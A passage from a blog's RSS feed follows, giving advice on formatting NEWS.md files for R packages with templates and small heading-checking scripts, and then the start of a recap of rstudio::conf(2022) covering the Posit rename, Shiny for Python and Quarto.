&lt;p&gt;What exactly is meant by the first point here? In general, the NEWS is intended first and foremost for the package users. It should therefore focus on changes that are likely of interest to the users, including new features, bug fixes and breaking changes.&lt;/p&gt;
&lt;p&gt;Some R packages may also have a &lt;code&gt;ChangeLog&lt;/code&gt;, the purpose of which is to list &lt;strong&gt;all&lt;/strong&gt; changes (including to source code). This is more relevant to the package developers, and over time its purpose has been increasingly subsumed by version control tools such as Git and hosting platforms like GitHub.&lt;/p&gt;
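&lt;p&gt;The GNU guideline that the latest release sits at the top of the file is easy to check mechanically. The following is a minimal sketch, written in Python purely for illustration: it assumes top-level markdown headings of the form &lt;code&gt;# packageName x.y.z&lt;/code&gt;, the NEWS text is made up, and &lt;code&gt;release_versions()&lt;/code&gt; and &lt;code&gt;newest_first()&lt;/code&gt; are hypothetical helper names rather than part of any existing tool.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;import re

# hypothetical NEWS.md content, newest release first
NEWS_TEXT = """\
# packageName 3.0.0

## Breaking changes

* `enhancedFunction()` now accepts an extra argument `newArg`

# packageName 2.1.0

* Fixed a bug in `legendFunction()`
"""

# assumed heading convention: "# package major.minor.patch"
HEADING = re.compile(r"^# \S+ (\d+)\.(\d+)\.(\d+)\s*$", re.MULTILINE)

def release_versions(news_text):
    """Return the versions found in top-level headings, in file order."""
    return [tuple(int(part) for part in match.groups())
            for match in HEADING.finditer(news_text)]

def newest_first(news_text):
    """Check that the releases are listed from newest to oldest."""
    versions = release_versions(news_text)
    return versions == sorted(versions, reverse=True)

print(release_versions(NEWS_TEXT))
print(newest_first(NEWS_TEXT))
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Versions are compared as tuples of integers rather than as strings, so that, for example, 1.10.0 is treated as newer than 1.9.0.&lt;/p&gt;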
&lt;h3 id="top-tips-for-writing-good-news"&gt;Top tips for writing &amp;ldquo;good&amp;rdquo; NEWS&lt;/h3&gt;
&lt;p&gt;Since the guidelines above are a bit vague and open-ended when it comes to format, we will share some top tips and examples to help ensure your NEWS is readable and easily accessible!&lt;/p&gt;
&lt;h4 id="markdown-is-best"&gt;Markdown is best&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://r-pkgs.org/other-markdown.html#news" rel="external"&gt;R packages (second edition)&lt;/a&gt; recommends the markdown format (&lt;code&gt;NEWS.md&lt;/code&gt;) over the plain text and &lt;code&gt;.Rd&lt;/code&gt; formats. Some advantages of &lt;code&gt;NEWS.md&lt;/code&gt; include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Markdown is readable as both plain text (e.g., when copied into an email) and HTML (e.g., when viewed on GitHub/GitLab).&lt;/li&gt;
&lt;li&gt;If you&amp;rsquo;re building a {&lt;a href="https://pkgdown.r-lib.org/" rel="external"&gt;&lt;code&gt;pkgdown&lt;/code&gt;&lt;/a&gt;} website for your package, the &lt;code&gt;NEWS.md&lt;/code&gt; will get nicely rendered (including any links to GitHub users and issues).&lt;/li&gt;
&lt;li&gt;Access to {usethis} shortcuts: &lt;code&gt;usethis::use_news_md()&lt;/code&gt; creates a skeleton &lt;code&gt;NEWS.md&lt;/code&gt;, and &lt;code&gt;usethis::use_version()&lt;/code&gt; increments the version and adds a new heading to your &lt;code&gt;NEWS.md&lt;/code&gt; file (for more info on version bumping, see &lt;a href="https://semver.org/" rel="external"&gt;semver.org&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In terms of how &lt;code&gt;NEWS.md&lt;/code&gt; should be presented, we recommend something close to the template below, which includes both a major release (containing a lot of changes which have been divided into subsections) and a minor release:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;# packageName 3.0.0
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;This is a major release adding a range of substantial new features and fixing a
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;large number of bugs
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Breaking changes
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;`enhancedFunction()`&lt;/span&gt; now accepts an extra argument &lt;span style="color:#a5d6ff"&gt;`newArg`&lt;/span&gt;, which controls
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; the behaviour of ... (&lt;span style="color:#ffa657"&gt;#18&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;#20&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;@parisa1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;`legendFunction()`&lt;/span&gt; by default now generates a legend with no border, rather
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; than a black border
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## New features
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;`newFunction()`&lt;/span&gt; added which does ... (&lt;span style="color:#ffa657"&gt;#16&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;@myles&lt;/span&gt;-mitchell)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;`enhancedFunction()`&lt;/span&gt; now accepts an argument &lt;span style="color:#a5d6ff"&gt;`newArg`&lt;/span&gt;, which controls the
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; behaviour of ... (&lt;span style="color:#ffa657"&gt;#18&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;#20&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;@parisa1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;## Bug fixes
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Axes generated using &lt;span style="color:#a5d6ff"&gt;`plottingFunction()`&lt;/span&gt; no longer overlap (&lt;span style="color:#ffa657"&gt;#25&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ffa657"&gt;@myles&lt;/span&gt;-mitchell)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;# packageName 2.3.0
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Feature: added a new function which does... (&lt;span style="color:#ffa657"&gt;#33&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;@parisa1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Fix: resolved a minor bug which prevented... (&lt;span style="color:#ffa657"&gt;#46&lt;/span&gt;, &lt;span style="color:#ffa657"&gt;@myles&lt;/span&gt;-mitchell)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When viewed in GitLab, this will be nicely rendered:&lt;/p&gt;
&lt;p&gt;&lt;img alt="gitlab render" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/intro-to-r-news-format/gitlab_news.png" width="1280"&gt;&lt;/p&gt;
&lt;p&gt;Note that the heading for each release is made up of the package name followed by the version number, and the changes are listed using bullet points. This also follows the format given in the &lt;a href="https://style.tidyverse.org/news.html" rel="external"&gt;tidyverse style guide&lt;/a&gt; which recommends that &amp;ldquo;each user-facing change to a package should be accompanied by a bullet&amp;rdquo; and that &amp;ldquo;each release should have a level 1 (#) heading&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;For enhanced readability, a major release with a lot of changes may be divided into subsections, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Breaking changes&lt;/strong&gt; - any changes that may cause a user&amp;rsquo;s code to break or produce an unexpected output&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;New features&lt;/strong&gt; - could include new functions and options&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bug fixes&lt;/strong&gt; - self-explanatory&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note that items listed under &lt;strong&gt;Breaking changes&lt;/strong&gt; should also be repeated under the other relevant section (&lt;strong&gt;New features&lt;/strong&gt; or &lt;strong&gt;Bug fixes&lt;/strong&gt;).&lt;/p&gt;
&lt;p&gt;Rather than dividing into subsections, you could also label individual bullet points, as we have done for the minor release above.&lt;/p&gt;
&lt;p&gt;For some of the changes above, we have credited individual developers and referenced the corresponding GitLab issues. These links have been automatically rendered in GitLab.&lt;/p&gt;
&lt;h4 id="news-at-jumping-rivers"&gt;NEWS at Jumping Rivers&lt;/h4&gt;
&lt;p&gt;At Jumping Rivers we use a NEWS file format similar to the minor release in the example above:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Each item is recorded in a single line.&lt;/li&gt;
&lt;li&gt;Items are listed all together, rather than in separate sections.&lt;/li&gt;
&lt;li&gt;Items are recorded following the &lt;a href="https://www.conventionalcommits.org/en/v1.0.0/" rel="external"&gt;Conventional Commits&lt;/a&gt; specification.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We chose this format because we roughly follow the GitLab flow model and have a short merge request cycle. Thus, few user-facing changes are added to the main branch in any one merge request (&lt;em&gt;in theory&lt;/em&gt;).&lt;/p&gt;
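&lt;p&gt;As a rough illustration of the single-line convention, the base-R sketch below splits each item into its Conventional Commits type and description. The example items, the optional scope and the regular expression are assumptions made for illustration; this is not the tooling we use internally.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical NEWS items, one per line, in a Conventional Commits style:
# "type(optional scope): description"
news_items &amp;lt;- c(
  "* feat: added a new function which does ... (#33, @parisa1)",
  "* fix(plot): resolved a minor bug which prevented ... (#46, @myles-mitchell)"
)

# Bullet marker, type, optional "(scope)", optional "!", colon, description
pattern &amp;lt;- "^\\* ([a-z]+)(\\([^)]+\\))?!?: (.+)$"

parsed &amp;lt;- data.frame(
  type = sub(pattern, "\\1", news_items),
  description = sub(pattern, "\\3", news_items),
  stringsAsFactors = FALSE
)

# Count how many items of each type the release contains
table(parsed$type)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Because every item sits on one line with a leading type, a summary like this needs nothing more than a regular expression.&lt;/p&gt;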
&lt;h4 id="compatibility-with-utilsnews"&gt;Compatibility with utils::news()&lt;/h4&gt;
&lt;p&gt;The quickest way for a user to access package news is with the &lt;a href="https://rdrr.io/r/utils/news.html" rel="external"&gt;&lt;code&gt;news()&lt;/code&gt; function&lt;/a&gt; (from the base-R utils package), which can handle the &lt;code&gt;NEWS&lt;/code&gt;, &lt;code&gt;NEWS.md&lt;/code&gt; and &lt;code&gt;NEWS.Rd&lt;/code&gt; formats:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;news&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;packageName&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you&amp;rsquo;re working in RStudio, this will display the NEWS under the Help tab, identifying the version number along with each set of changes. The screenshot below shows an excerpt for {dplyr}:&lt;/p&gt;
&lt;p&gt;&lt;img alt="news function output" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/intro-to-r-news-format/news_function.png" width="1308"&gt;&lt;/p&gt;
&lt;p&gt;If you don&amp;rsquo;t have the package installed, you can also point the function to the package folder location using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;news&lt;/span&gt;(package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;packageName&amp;#34;&lt;/span&gt;, lib.loc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;package_dir/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;where &lt;code&gt;package_dir/&lt;/code&gt; would be the directory containing the package folder.&lt;/p&gt;
&lt;p&gt;When writing a NEWS file for your package, it is always a good idea to check that the &lt;code&gt;news()&lt;/code&gt; function can correctly display it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;This is a quick and easy way to test your formatting.&lt;/li&gt;
&lt;li&gt;It ensures your package NEWS can be easily accessed by your users.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As an example, here is an excerpt from the &lt;code&gt;NEWS.md&lt;/code&gt; file for the {benchmarkme} package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;# benchmarkme Version 1.0.8 _2022-06-02_
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; fix: &lt;span style="color:#a5d6ff"&gt;`get_ram()`&lt;/span&gt; for windows (thanks to &lt;span style="color:#ffa657"&gt;@ArkaB&lt;/span&gt;-DS &lt;span style="color:#ffa657"&gt;@xiaodaigh&lt;/span&gt; &lt;span style="color:#ffa657"&gt;#45&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; internal: linting &amp;amp; format NEWS.md file
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;# benchmarkme Version 1.0.7 _2022-01-17_
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Internal: Suppress warnings on &lt;span style="color:#a5d6ff"&gt;`sysctl`&lt;/span&gt; calls
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Fix: &lt;span style="color:#a5d6ff"&gt;`get_ram()`&lt;/span&gt; for windows (thanks to &lt;span style="color:#ffa657"&gt;@ArkaB&lt;/span&gt;-DS &lt;span style="color:#ffa657"&gt;#41&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;*&lt;/span&gt; Deprecate Solaris support
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is perfectly readable and consistent with the guidelines mentioned above.&lt;/p&gt;
&lt;p&gt;Now, here is the output from the &lt;code&gt;news()&lt;/code&gt; function:&lt;/p&gt;
&lt;p&gt;&lt;img alt="benchmarkme news output" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/intro-to-r-news-format/benchmarkme_news.png" width="1046"&gt;&lt;/p&gt;
&lt;p&gt;The date is getting picked up by &lt;code&gt;news()&lt;/code&gt; as the version number, making it unclear which version each set of changes corresponds to. The bullet points also look off.&lt;/p&gt;
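&lt;p&gt;A quick pre-release check can catch headings like these. The base-R sketch below is only a rough lint: it assumes level 1 headings made up of the package name, a version number and an optional date in parentheses, and the helper name &lt;code&gt;check_news_headings()&lt;/code&gt; is hypothetical. It is not the parser that &lt;code&gt;news()&lt;/code&gt; itself uses, so it complements rather than replaces a call to &lt;code&gt;news()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: flag level 1 headings that do not look like
# "# packageName X.Y.Z" or "# packageName X.Y.Z (YYYY-MM-DD)"
check_news_headings &amp;lt;- function(lines) {
  headings &amp;lt;- grep("^# ", lines, value = TRUE)
  pattern &amp;lt;- paste0(
    "^# [A-Za-z][A-Za-z0-9.]* ",                    # package name
    "[0-9]+(\\.[0-9]+)+",                           # version number
    "( \\([0-9]{4}-[0-9]{2}-[0-9]{2}\\))?$"         # optional (date)
  )
  data.frame(
    heading = headings,
    ok = grepl(pattern, headings),
    stringsAsFactors = FALSE
  )
}

# In practice the lines would come from readLines("NEWS.md")
news_lines &amp;lt;- c(
  "# benchmarkme Version 1.0.8 _2022-06-02_",
  " * fix: `get_ram()` for windows",
  "",
  "# benchmarkme 1.0.8 (2022-06-02)",
  " * fix: `get_ram()` for windows"
)

check_news_headings(news_lines)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here the first heading is flagged because of the extra word and the underscore-wrapped date, while the second passes.&lt;/p&gt;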
&lt;p&gt;The &lt;a href="https://rdrr.io/r/utils/news.html" rel="external"&gt;&lt;code&gt;news()&lt;/code&gt; documentation&lt;/a&gt; provides precise formatting guidelines for all three file types. For the &lt;code&gt;.md&lt;/code&gt; format, the guidelines are consistent with our template provided earlier. However, if you also want to show the release date, this should be enclosed in parentheses. A good heading would then be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-md" data-lang="md"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff;font-weight:bold"&gt;# packageName X.Y.Z (YYYY-MM-DD)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="beyond-news"&gt;Beyond NEWS&lt;/h3&gt;
&lt;p&gt;Whilst the NEWS file is a great place to record user-facing changes to your package, you can&amp;rsquo;t be sure that people will actually read it. They could be missing out on some great new features that you have worked hard to introduce! Accompanying a version release with a blog post which highlights major new features and bug fixes can be an effective way to inform your users. This is also recommended by the tidyverse style guide.&lt;/p&gt;
&lt;p&gt;From the user side you might find that looking through a NEWS file is fine for comparing a small number of changes or checking for new features. However, it can sometimes be hard to directly compare long lists of changes. &lt;a href="https://diffify.com/" rel="external"&gt;Diffify&lt;/a&gt; is a tool that allows you to easily check what has changed between two versions of a package:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It directly shows you any dependencies that have changed, as well as any functions that have been added, removed or changed.&lt;/li&gt;
&lt;li&gt;It also displays the NEWS file for each release between the two versions, so you can check the NEWS of any package in one place.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;Disclaimer&lt;/em&gt;: We are developers on Diffify so may be slightly biased in recommending it, but we think it&amp;rsquo;s really useful and complementary to the NEWS!&lt;/p&gt;
&lt;h3 id="further-reading"&gt;Further reading&lt;/h3&gt;
&lt;p&gt;The following links may be of interest for further reference on the structure and format of NEWS files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cran.r-project.org/doc/manuals/r-release/R-exts.html#Package-structure" rel="external"&gt;R package manual&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://r-pkgs.org/other-markdown.html#news" rel="external"&gt;R Packages (second edition)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://style.tidyverse.org/news.html" rel="external"&gt;The tidyverse style guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.bioconductor.org/developers/package-guidelines/#news" rel="external"&gt;Bioconductor guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://devguide.ropensci.org/newstemplate.html#newstemplate" rel="external"&gt;rOpenSci NEWS template&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rdrr.io/r/utils/news.html" rel="external"&gt;&lt;code&gt;utils::news()&lt;/code&gt; documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Another great blog post: &lt;a href="https://blog.r-hub.io/2020/05/08/pkg-news/" rel="external"&gt;Why and how maintain a NEWS file for your R package?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;For more on the semantic versioning framework: &lt;a href="https://semver.org/" rel="external"&gt;semver.org&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/intro-to-r-news-format/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Highlights from rstudio::conf(2022)</title><link>https://www.jumpingrivers.com/blog/highlights-rstudioconf2022/</link><pubDate>Thu, 11 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/highlights-rstudioconf2022/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/highlights-rstudioconf2022/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/highlights-rstudioconf2022/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;July 25 - 28 2022 saw thousands of people attend &lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;rstudio::conf(2022)&lt;/a&gt; both in-person in Washington D.C. and virtually from all over the world, including a few of us from Jumping Rivers. Here&amp;rsquo;s a recap of the big news, and a few of our personal highlights from the conference!&lt;/p&gt;
&lt;h2 id="the-secrets-are-out"&gt;The secrets are out!&lt;/h2&gt;
&lt;p&gt;There were a couple of big announcements during the conference that it would be remiss not to mention.&lt;/p&gt;
&lt;h3 id="rstudio---posit"&gt;RStudio -&amp;gt; Posit&lt;/h3&gt;
&lt;p&gt;The biggest announcement of the conference was that as of October 2022, RStudio will have a new name: &lt;a href="https://posit.co" rel="external"&gt;Posit&lt;/a&gt;. RStudio are committed to developing open source software for &lt;a href="https://www.rstudio.com/blog/rstudio-is-becoming-posit/" rel="external"&gt;data science, scientific research, and technical communication&lt;/a&gt;, and for the past few years have been extending support for additional programming languages beyond R. RStudio Connect, RStudio Workbench, and RStudio Package Manager will become Posit Connect, Posit Workbench, and Posit Package Manager - making it clearer that these products support multiple languages. But don&amp;rsquo;t fear - RStudio are not abandoning R, as most of their open source software will continue to be predominantly developed for R. And the RStudio name will live on - returning to the days when RStudio referred to the IDE.&lt;/p&gt;
&lt;h3 id="shiny-for-python"&gt;Shiny for Python&lt;/h3&gt;
&lt;p&gt;In keeping with the theme of supporting multiple programming languages, Joe Cheng&amp;rsquo;s keynote on Wednesday afternoon revealed the release of &lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;Shiny for Python&lt;/a&gt;. Shiny is designed to make it simple to build interactive web applications, and now you can build them using Python as well as R. We already use both Python and R at Jumping Rivers, so this is an exciting development for us - we&amp;rsquo;ve already started playing with it!&lt;/p&gt;
&lt;p style="width: 50%; margin: auto;"&gt;
&lt;img src="shiny_python.png?raw=true" alt="Screenshot of the Shiny for Python gallery showing six examples of dashboards"&gt;
&lt;/p&gt;
&lt;p align = "center" style="font-style: italic;"&gt;
Image from &lt;a href="https://shiny.rstudio.com/py/gallery/" target = "_blank"&gt;shiny.rstudio.com/py/gallery&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="quarto"&gt;Quarto&lt;/h3&gt;
&lt;p&gt;Although &lt;a href="https://quarto.org/" rel="external"&gt;Quarto&lt;/a&gt; has been available for a few months now, rstudio::conf(2022) marked it&amp;rsquo;s official announcement. Quarto is essentially the next generation of RMarkdown - used to join your code together with textual descriptions to create outputs in multiple formats with support for R, Python, Julia, Javascript, and many other programming languages. The keynote from Mine Cetinkaya-Rundel and Julia Lowndes showed just how incredible Quarto is for authoring and collaborating on documents in multiple formats and multiple languages. I&amp;rsquo;d definitely recommend catching up on this talk when the recordings are released if you missed it!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-highlights-rstudioconf2022"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h2 id="highlights"&gt;Highlights&lt;/h2&gt;
&lt;p&gt;There were so many incredible talks throughout the conference (and many more whose recordings I&amp;rsquo;m excited to catch up on), so here are just a few favourites.&lt;/p&gt;
&lt;h3 id="joe-cheng"&gt;&lt;a href="https://twitter.com/jcheng" rel="external"&gt;Joe Cheng&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;The Past and Future of Shiny&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s been ten years since Shiny was first released. In this keynote, Joe talked about the journey Shiny has been on - from the moment Shiny was first created (and how it was named), to the announcement of Shiny for Python (and his &amp;ldquo;&lt;a href="https://twitter.com/jcheng/status/1552428978509680642" rel="external"&gt;you write the book and I&amp;rsquo;ll build you a bike&lt;/a&gt;&amp;rdquo; exchange with Hadley).&lt;/p&gt;
&lt;h3 id="tan-ho"&gt;&lt;a href="https://twitter.com/_TanHo" rel="external"&gt;Tan Ho&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Project Immortality: Using GitHub To Make Your Work Live Forever&lt;/em&gt;&lt;/p&gt;
